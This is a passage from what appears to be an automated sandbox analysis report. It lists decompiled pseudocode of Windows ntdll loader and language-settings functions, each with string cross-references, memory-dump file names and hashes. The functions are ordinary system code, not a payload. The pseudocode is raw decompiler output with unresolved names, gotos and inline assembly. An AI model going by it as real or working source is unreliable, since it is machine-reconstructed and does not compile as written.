						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0469F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E046A1370(_v16, 0x4634e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0469BB40(_t262,  &_v68, _t244);
								if(L046643C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E046A1370(_t282, 0x4634e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0469BB40(_t262,  &_v68, _t201);
							if(L046643C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L04674620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0469F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E046A1370(_t280, 0x4634e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0469BB40(_t267,  &_v68, _t245);
							if(L046643C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E046A1370(_t284, 0x4634e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0469BB40(_t267,  &_v68, _t224);
						if(L046643C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x04663d3c
0x04663d42
0x04663d44
0x04663d46
0x04663d49
0x04663d4c
0x04663d4f
0x04663d52
0x04663d55
0x04663d58
0x04663d5b
0x04663d5f
0x04663d61
0x04663d66
0x046b8213
0x046b8218
0x04664085
0x04664088
0x0466408e
0x04664094
0x0466409a
0x046640a0
0x046640a6
0x046640a9
0x046640af
0x046640b6
0x046640bd
0x046640bd
0x04663d83
0x046b821f
0x046b8229
0x046b8238
0x046b8238
0x046b823d
0x046b823d
0x04663da0
0x04663daf
0x04663db5
0x04663dba
0x04663dba
0x04663dd4
0x04663e94
0x04663eab
0x04663f6d
0x04663f84
0x0466406b
0x0466406b
0x0466406e
0x0466406e
0x04664070
0x04664074
0x046b8351
0x046b8351
0x0466407a
0x0466407f
0x046b835d
0x046b8370
0x046b8377
0x046b8379
0x046b837c
0x046b837c
0x046b835d
0x00000000
0x0466407f
0x04663f8a
0x04663f8d
0x04663f90
0x04663f95
0x046b830d
0x046b830f
0x04663f9b
0x04663fac
0x04663fae
0x04663fb1
0x04663fb1
0x04663fb6
0x046b8317
0x046b831a
0x00000000
0x04663fbc
0x04663fc1
0x04663fc9
0x04663fd7
0x04663fda
0x04663fdd
0x04664021
0x04664021
0x04664029
0x04664030
0x04664044
0x04664046
0x04664046
0x04664044
0x04664049
0x046b8327
0x046b8334
0x046b8339
0x046b833c
0x0466404f
0x0466404f
0x0466404f
0x04664051
0x04664056
0x04664063
0x04664063
0x04664068
0x00000000
0x04664068
0x04663fdf
0x04663fe2
0x04663fe4
0x04663fe7
0x04663fef
0x04664003
0x04664005
0x04664005
0x0466400c
0x04664013
0x04664016
0x04664017
0x0466401b
0x0466401e
0x00000000
0x0466401e
0x04663fb6
0x04663eb1
0x04663eb4
0x04663eb7
0x04663ebc
0x046b82a9
0x046b82ab
0x04663ec2
0x04663ed3
0x04663ed5
0x04663ed8
0x04663ed8
0x04663edd
0x046b82b3
0x046b82b6
0x00000000
0x04663ee3
0x04663ee8
0x04663eed
0x04663ef0
0x04663ef3
0x04663f02
0x04663f05
0x04663f08
0x046b82c0
0x046b82c3
0x046b82c5
0x046b82c8
0x046b82d0
0x046b82e4
0x046b82e6
0x046b82e6
0x046b82ed
0x046b82f4
0x046b82f7
0x046b82f8
0x046b82fc
0x046b82ff
0x046b82ff
0x04663f0e
0x04663f11
0x04663f16
0x04663f1d
0x04663f31
0x046b8307
0x046b8307
0x04663f31
0x04663f39
0x04663f48
0x04663f4d
0x04663f50
0x04663f50
0x04663f53
0x04663f58
0x04663f65
0x04663f65
0x04663f6a
0x00000000
0x04663f6a
0x04663edd
0x04663dda
0x04663ddd
0x04663de0
0x04663de5
0x046b8245
0x04663deb
0x04663df7
0x04663dfc
0x04663dfe
0x04663e01
0x04663e01
0x04663e06
0x046b824d
0x046b824f
0x046b8254
0x00000000
0x04663e0c
0x04663e11
0x04663e16
0x04663e19
0x04663e29
0x04663e2c
0x04663e2f
0x046b825c
0x046b825f
0x046b8261
0x046b8264
0x046b826c
0x046b8280
0x046b8282
0x046b8282
0x046b8289
0x046b8290
0x046b8293
0x046b8294
0x046b8298
0x046b829b
0x046b829b
0x04663e35
0x04663e38
0x04663e3d
0x04663e44
0x04663e58
0x046b82a3
0x046b82a3
0x04663e58
0x04663e60
0x04663e6f
0x04663e74
0x04663e77
0x04663e77
0x04663e7a
0x04663e7f
0x04663e8c
0x04663e8c
0x04663e91
0x00000000
0x04663e91

Strings

Kernel-MUI-Language-Disallowed, xrefs: 04663E97
Kernel-MUI-Number-Allowed, xrefs: 04663D8C
Kernel-MUI-Language-Allowed, xrefs: 04663DC0
Kernel-MUI-Language-SKU, xrefs: 04663F70
WindowsExcludedProcs, xrefs: 04663D6F

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 4ec60911625f2f629d28a8d41408b3ca23d2898f54fefd778bca638398e897e3
Instruction ID: dbbc6d5f07ed2b6269744e55db604c101449227a4e5e2553c1cdde3411118f00
Opcode Fuzzy Hash: 4ec60911625f2f629d28a8d41408b3ca23d2898f54fefd778bca638398e897e3
Instruction Fuzzy Hash: 7CF12C72D00619EFDB11DF98C980AEEB7BDBF48650F14005AE906A7350FB75AE41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 04668794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E04668794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0466934A() != 0) {
								_t159 = E046DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x4745780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E046D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x4745780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0466849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E04668999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E04668999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x4745c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x4745c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E04672280(_t92, 0x47486cc);
															_t94 = E04729DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E046861A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x4745c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E04668A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x4745c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x4745c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0469F380(_t136, 0x4631184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E04672280(_t108, 0x47486cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E046861A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E04729D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0466FFB0(_t118, _t156, 0x47486cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04699A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x04668799
0x0466879d
0x046687a1
0x046687a3
0x046687a8
0x046687c3
0x046687c3
0x046687c8
0x046687d1
0x046687d4
0x046687d8
0x046687e5
0x046687ec
0x046b9bfe
0x046b9c00
0x046b9c02
0x046b9c08
0x046b9c0d
0x046b9c0f
0x046b9c14
0x046b9c2d
0x046b9c32
0x046b9c37
0x046b9c3a
0x046b9c3c
0x046b9c42
0x046b9c42
0x046b9c3c
0x046b9c02
0x046687da
0x046687df
0x046687e3
0x00000000
0x00000000
0x046687e3
0x046687f2
0x00000000
0x046687fb
0x046687fd
0x046687fe
0x0466880e
0x0466880f
0x04668810
0x04668814
0x0466881a
0x0466881c
0x0466881f
0x04668821
0x04668822
0x04668824
0x04668826
0x0466882c
0x0466882e
0x046b9c48
0x046b9c48
0x04668834
0x04668834
0x04668837
0x00000000
0x00000000
0x04668837
0x0466882e
0x0466883d
0x04668840
0x04668843
0x04668846
0x04668849
0x0466884c
0x0466884e
0x04668850
0x04668852
0x04668854
0x04668857
0x046688b4
0x046688b6
0x046688b6
0x04668859
0x04668859
0x04668859
0x04668861
0x04668866
0x0466886a
0x0466893d
0x04668941
0x00000000
0x04668947
0x04668947
0x0466894a
0x0466894c
0x00000000
0x04668952
0x04668955
0x0466895a
0x0466895d
0x0466895d
0x0466895f
0x04668961
0x04668961
0x04668968
0x00000000
0x00000000
0x0466896a
0x0466896b
0x0466896e
0x00000000
0x04668970
0x04668970
0x04668970
0x04668970
0x04668972
0x04668972
0x04668974
0x00000000
0x0466897a
0x0466897a
0x0466897d
0x00000000
0x04668983
0x046b9c65
0x046b9c6d
0x046b9c72
0x046b9c75
0x046b9c75
0x046b9c82
0x046b9c86
0x046b9c87
0x046b9c88
0x046b9c89
0x046b9c8c
0x046b9c90
0x046b9c95
0x046b9c97
0x046b9ca0
0x046b9ca3
0x046b9ca9
0x046b9ca9
0x00000000
0x046b9ca9
0x046b9ca3
0x00000000
0x046b9c97
0x0466897d
0x00000000
0x04668974
0x04668988
0x04668992
0x04668996
0x00000000
0x04668996
0x0466894c
0x00000000
0x04668870
0x0466887b
0x0466887d
0x0466887f
0x04668881
0x04668884
0x04668884
0x04668886
0x04668889
0x0466888c
0x0466888e
0x04668891
0x04668891
0x04668898
0x00000000
0x00000000
0x0466889a
0x0466889b
0x0466889e
0x00000000
0x00000000
0x046688a0
0x046688a8
0x046688b0
0x046688b2
0x046688d3
0x046688d5
0x00000000
0x046688d7
0x046688db
0x046688dc
0x046688e0
0x046688e8
0x046688ee
0x046688f0
0x046688f3
0x046688fc
0x04668901
0x04668906
0x0466890c
0x0466890c
0x0466890f
0x04668916
0x04668917
0x04668918
0x04668919
0x0466891a
0x0466891f
0x04668921
0x046b9c52
0x046b9c55
0x046b9c5b
0x046b9cac
0x046b9cc0
0x046b9cc0
0x046b9c55
0x04668927
0x04668927
0x0466892f
0x04668933
0x00000000
0x046688f5
0x046688f5
0x00000000
0x046688f7
0x046688f7
0x046688fa
0x00000000
0x00000000
0x00000000
0x00000000
0x046688fa
0x046688f5
0x046688f3
0x00000000
0x046688d5
0x00000000
0x046688b2
0x046688c9
0x00000000
0x046688c9
0x0466887f
0x0466886a
0x04668857
0x04668852
0x046688bf
0x046688bf
0x046687aa
0x046687ad
0x046687ae
0x046687b4
0x046687b5
0x046687b6
0x046687b8
0x046687bd
0x046687c1
0x046687f4
0x046687fa
0x00000000
0x00000000
0x00000000
0x046687c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 046B9C18
minkernel\ntdll\ldrsnap.c, xrefs: 046B9C28
LdrpDoPostSnapWork, xrefs: 046B9C1E

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 360a756d4538527c5b0d96ae333f25400fb578f9ea77fae6e056a7163cabdd17
Instruction ID: 7bfc7bf0a128e8085320c729df52f5890543e13a0635382b8fc36b38a75334b2
Opcode Fuzzy Hash: 360a756d4538527c5b0d96ae333f25400fb578f9ea77fae6e056a7163cabdd17
Instruction Fuzzy Hash: 6A9101B1A01206AFEF28EF69C480ABAB7B5FF94344B04416DD906AB241F730FD45CB94

Uniqueness

Uniqueness Score: -1.00%

Function 04667E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E04667E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0466CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0465C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x4745780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E046D5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x4745780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E04677D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04677D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E046D7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E04677D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E04677D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E046D7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0468A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0465B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x04667e4c
0x04667e50
0x04667e55
0x04667e58
0x04667e5d
0x04667e71
0x04667f33
0x04667e77
0x04667e77
0x04667e79
0x04667e79
0x04667e7e
0x04667f45
0x046b9848
0x00000000
0x046b9848
0x04667f4e
0x04667f53
0x04667f5a
0x00000000
0x00000000
0x046b985a
0x046b9862
0x046b9866
0x00000000
0x046b986c
0x00000000
0x046b986c
0x04667e84
0x04667e84
0x04667e8d
0x046b9871
0x04667eb8
0x04667ec0
0x04667ec0
0x04667e9a
0x046b987e
0x00000000
0x00000000
0x046b9884
0x046b988b
0x046b98a7
0x046b98ac
0x046b98b1
0x046b98b6
0x046b98b8
0x046b98b8
0x046b98b9
0x00000000
0x046b98b9
0x04667ea0
0x04667ea7
0x00000000
0x00000000
0x04667eac
0x04667eb1
0x04667ec6
0x04667ed0
0x046b98cc
0x04667ed6
0x04667ed6
0x04667ed6
0x04667ede
0x04667ee3
0x046b98e3
0x046b98f0
0x046b9902
0x046b98f2
0x046b98fb
0x046b98fb
0x046b9907
0x046b991d
0x046b991d
0x046b9907
0x046b98e3
0x04667ef0
0x04667f14
0x04667f14
0x04667f1e
0x046b9946
0x04667f24
0x04667f24
0x04667f24
0x04667f2c
0x046b996a
0x046b9975
0x046b9975
0x046b997e
0x046b9993
0x046b9993
0x046b997e
0x00000000
0x04667ef2
0x04667efc
0x04667f0a
0x04667f0e
0x046b9933
0x00000000
0x046b9933
0x00000000
0x04667f0e
0x00000000
0x00000000
0x00000000
0x04667eb1

Strings

LdrpCompleteMapModule, xrefs: 046B9898
Could not validate the crypto signature for DLL %wZ, xrefs: 046B9891
minkernel\ntdll\ldrmap.c, xrefs: 046B98A2

Memory Dump Source

Source File: 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp, Offset: 04630000, based on PE: true

Associated: 00000008.00000002.941052600.000000000474B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.941064935.000000000474F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: bdd9894ecc40ceb7d33a6ccf50d37e70c888510da51fd2bab9d4f948b1e2247c
Instruction ID: 73d7ec787d89364c11757b64ff85b5f6cc7f9ca9b5c9f5e8cceed97063d12dda
Opcode Fuzzy Hash: bdd9894ecc40ceb7d33a6ccf50d37e70c888510da51fd2bab9d4f948b1e2247c
Instruction Fuzzy Hash: A6511271B007459BE721CF68C944B6ABBE4EB00719F04066AE9929B3E1F734FD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0465E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0465E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0465F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E046995D0();
						}
						if(_t78 != 0) {
							L046777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0469FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0469BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04699600();
					if(_t97 < 0) {
						goto L6;
					}
					E0469BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0465F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0469BB40(_t83, _t102 + 0x24, _t78);
								if(L046643C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0469BB40(_t84, _t102 + 0x24, _t94);
									if(L046643C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
